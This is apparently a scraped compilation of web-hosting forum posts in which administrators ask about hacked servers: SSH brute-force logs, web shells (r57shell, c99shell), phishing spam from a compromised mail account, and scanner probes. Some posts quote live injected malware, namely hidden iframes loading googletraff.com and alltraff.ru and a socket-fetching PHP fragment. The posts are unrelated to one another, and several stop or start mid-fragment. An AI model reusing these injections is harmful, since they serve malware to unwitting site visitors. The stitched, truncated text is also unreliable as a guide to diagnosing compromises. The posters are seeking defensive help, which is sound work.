I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.
We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".
We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.
Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )
I have started seeing the following error in the Event Viewer every day:
"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."
The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?
Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?
A new client has just opened up an account and the first thing hes installed at a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them their root kits of some sort. Amd I correct in thinking this?
The account has been susspended for the time being.
Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser ] - Suspicious directory The 'someuser' is a legitimate user on the server, an auto body website setup last October.
The content of the directory:
Quote:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh total 3.0K drwx------ 2 someuser someuser 1.0K May 16 17:54 ./ drwx------ 3 someuser someuser 1.0K May 16 17:54 ../ -rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm
Just an FYI - we have been monitoring some attempts from europe. Here is a file that they were trying to include using a hole in PHPCoin's URL handler:
[URL removed] stringa.txt
The attempt was coming from linux.htd-information.dk
I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.
when I add "?" to the end of the URL[url]" it runs with no problems!
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code: ><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ --> Also a line.php with the following code
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?> So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.
I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.
The problem is that their old index.htm page has a pagerank of 4 which we want to keep.
And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.
The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.
My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?
JavaScript, I have heard is completely out the question
I have reported this to BurstNET admin/abuse/NOC and have added a line to block them for now.
Does this belong to anyone??? Nslookup/dig reveals nothing.
This is my /var/log/messages Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2 Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT! Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2 Mar 19 19:24:52 ginger sshd[11567]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT! Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2 Mar 19 19:24:53 ginger sshd[11569]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT! Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2 Mar 19 19:24:55 ginger sshd[11571]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT! Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2 Mar 19 19:24:57 ginger sshd[11573]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - !POSSIBLE BREAK-IN ATTEMPT
my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.
[url] [url] [url] [url] [url]
I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.
Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.
65%3e%27%29")); </script> and this is the decoded one :
Code: window.status='Done';document.write('<iframe name=749a06043a src='http://alltraff.ru/lol.php?'+Math.round(Math.random()*31084)+'520b36503' width=76 height=409 style='display: none'></iframe>') i need to know 2 things : 1- is it possible that my developer did something wrong and hackers can append anything to his code ? . or it is a server issue and my host provider servers hacked !? 2- does anybody know anything about this piece of code ? (i dont mean it's action , i want to know ! is it known ?)
I have searched and searched but can't find anything related here, on Cpanel.net or through google.
I have a Linux/Cpanel machine. Hosts about 15-20 websites. No matter which site you try to visit it is redirected to some malware site or something that tries to get you download a program (Clearly a virus or trojan).
I cannot find any info on this or how to even stop the redirects.
My firewalls block IP's from multiple failed login attempts. The FW on one server has been blocking someone from The Planet. My servers are at GNAX, so why is someone from TP trying to get in?
May 28 16:23:06 server sshd(pam_unix)[13017]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root
I got so many of this line in my server log.
First of all, where is the server log located anyway? I got this from SIM.
May 28 16:23:09 server sshd(pam_unix)[13037]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13045]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:11 server sshd(pam_unix)[13061]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13066]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13067]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 16:23:13 server sshd(pam_unix)[13071]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=58.56.106.248 user=root May 28 17:00:02 server ntpdate[19626]: adjust time server 192.5.41.40 offset 0.343837 sec May 28 18:00:07 server ntpdate[28711]: adjust time server 192.5.41.40 offset 0.344493 sec May 28 19:00:06 server ntpdate[3218]: adjust time server 192.5.41.40 offset 0.342326 sec May 28 20:00:02 server ntpdate[8283]: adjust time server 192.5.41.40 offset 0.341603 sec May 28 21:00:07 server ntpdate[13899]: adjust time server 192.5.41.40 offset 0.343715 sec May 28 21:37:45 server sshd(pam_unix)[17268]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17271]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17270]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root May 28 21:37:45 server sshd(pam_unix)[17254]: authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=217.156.110.24 user=root
I have not been able to login to my cPanel from my desktop which runs WinXP service Pack3. Both Firefox and Internet Explorer returns the following error message
Login Attempt Failed!
Also, I am unable to connect using Filezilla Client.
However, I am able to connect to the same cPanel on my colleague's desktop which runs WinXP service Pack3 using Firefox browser or IE. We both share the same internet modem.
- I have cleared all the cookies and private data on my desktop. Still the problem persist.
- I changed to a different user on my desktop, but still could not login.
- I changed my desktop IP address but still I could not log in.
I use DSLinux from within Innotek Virtual Box and I was able to login to the same cPanel with the same details that were rejected under WinXP.
Please anyone with a solution should please advise me on what to do. Thanks in advance.
It is not convenient going to my colleagues desk to access my cPanel.
one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to
GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"
I just had a client whose hosting account was automatically suspended due to him not paying the hosting bill. He opened up a ticket and asked why his site is suspended. I informed him that he didn't pay the bill and the system suspended it automatically. I told him that the system generated e-mails as well and he said he didn't get them while I looked in WHCMS, it said it DID get sent to him. Client said his website was DDOS'd because it used 3 GB of BW in one month and i told him there was no DDOS attack. The kind of site he had (100+ users online at one time, vBulletin forum), it was common to use that much.
The client is now saying that he is going to hack attempt the servers to see if they are DDOS Protected or not. Of Course, my servers are protected (WiredTree), so should I be worried?
His quote:
Quote:
I'LL TEST TO SEE IF YOU HAVE DDOS PROTECTION...TIME TO GATHER MY HACKING BUDDYS.
Also, I have notified WiredTree about this just right now.
I'm not a server admin, but help my client with basic it tasks...we built their website for them and just sort of fell into helping them out when they need it. My client has a vps with knownhost, the vps is only used for hosting the email for their domain, the website is hosted on another server. 4 days ago, I logged in and checked the mail queue and found thousands of emails in the queue that were phishing emails trying to get passwords from the recipients for a service called moneybookers.com. According to knownhost, the hacker had guessed the password of one of the email accounts and had started sending mail through it. The hacked account was deleted that day as it was a test account and was not needed anyways. As soon as the account was deleted, the phishing mails stopped being sent. Knownhost reassured us the server hadn't been breached, but we changed the root password anyways. Around 15k to 20k emails were sent in a 14 hour period. Since that time we have appeared on a few blacklsts and have a negative senderbase score and so any company that uses senderbase is obviously rejecting our mail... My client has just hired assuretymail services to get accredited and has invested a lot of money into streamlining mail delivery, so this is obviously devastating to them.
Today I logged in and again found 1000's of email in queue, yet again, and this time they were paypal phishing emails. I immediately changed the passwords of all 50 of the email accounts, including the root. It looks like around 14k or so emails were sent.
Trying to understand how this could happen yet again, knownhost is saying that, yet again the account "test", the same account used last time was used for sending out emails. I was confused by how a previously deleted account could be used to again begin sending emails even though it was deleted 4 days ago. According to knownhost "[FONT='Verdana','sans-serif']The only reasonable explanation for this activity would be that exim cached credentials for system user "test" and didn't refresh its internal cache since the moment when "test" account was removed. To force exim to refresh the cache exim mail server was restarted on your system, so it shouldn't be possible to use that (non-existent) account again to relay the mail through your system."[/FONT]
[FONT='Verdana','sans-serif'][/FONT] [FONT='Verdana','sans-serif']Being that I'm not a server admin and I rely on knownhost for server admin basics, am I out of line thinking that knownhost dropped the ball here? I mean is it obvious that a restart was in order after the first hack or is this just a bad chance scenario. Is the scenario they are describing plausible?[/FONT]
my VPS provider just rebuilt my VPS after many hack attacks.
From some days I am getting emails from firewall that someone login to my VPS/mySQL using SSH.
I don't know what they do, but they don't disturb any account. Only some downtime feel during this. But last night my VPS stop working so my provider rebuilt VPS.
how I can secure my VPS now. I have Cpanel installed.
My server (cent OS4, plesk 8) was frozen for a day and the NOC had to reboot it, here is the mail I got from my host:
>Your server was frozen, with a kernel panic. Ensure that you check your logs closely to determine how this happened,
After looking at the message log here is the part of the log when the crash happened: Is this really a kernel panic, I am not sure...
Dec 8 09:05:36 server kernel: input: AT Translated Set 2 keyboard on isa0060/serio0 Dec 8 09:05:37 server hal.hotplug[2701]: DEVPATH is not set Dec 8 09:05:37 server hal.hotplug[2702]: DEVPATH is not set Dec 8 09:05:42 server login(pam_unix)[2670]: bad username [ ] Dec 8 09:05:42 server login[2670]: Authentication started for user Dec 8 09:05:44 server login[2670]: FAILED LOGIN 1 FROM (null) FOR , Authentication failure Dec 8 09:05:50 server login(pam_unix)[2670]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty1 ruser= rhost= user=root Dec 8 09:05:50 server login[2670]: Authentication started for user root Dec 8 09:05:53 server login[2670]: FAILED LOGIN 2 FROM (null) FOR root, Authentication failure Dec 8 09:05:57 server login(pam_unix)[2671]: authentication failure; logname=LOGIN uid=0 euid=0 tty=tty2 ruser= rhost= user=root Dec 8 09:05:57 server login[2671]: Authentication started for user root Dec 8 09:05:59 server login[2671]: FAILED LOGIN 1 FROM (null) FOR root, Authentication failure Dec 8 09:06:00 server shutdown: shutting down for system reboot Dec 8 09:06:00 server init: Switching to runlevel: 6 ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ Dec 9 05:52:36 server syslogd 1.4.1: restart.
It looks to me like if someone has physically connected a keyboard and logged in at the NOC.
I use Iptable to restrict ssh access to my IP each time I connect remotly, so I dont' think a remote connection has been possible.
any idea about this line: ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ I think it's just corupted data the was written when the server shutt down.
Also i didn't find any other signes of kernel panic in the logs
Looking at the httpd error log I found this lines before the crash:
[Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind [Sat Dec 08 00:44:40 2007] [error] [client 213.215.41.138] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.at.ISC.SANS.DFind
apparently somone doing server scan. maybe the 2 events are correlated and the server freeze could have been a result of some buffer overflow attack, but i sould be finding some evidences of this on the apache logs?
What direction should I take to investigate a bit further on this server freeze?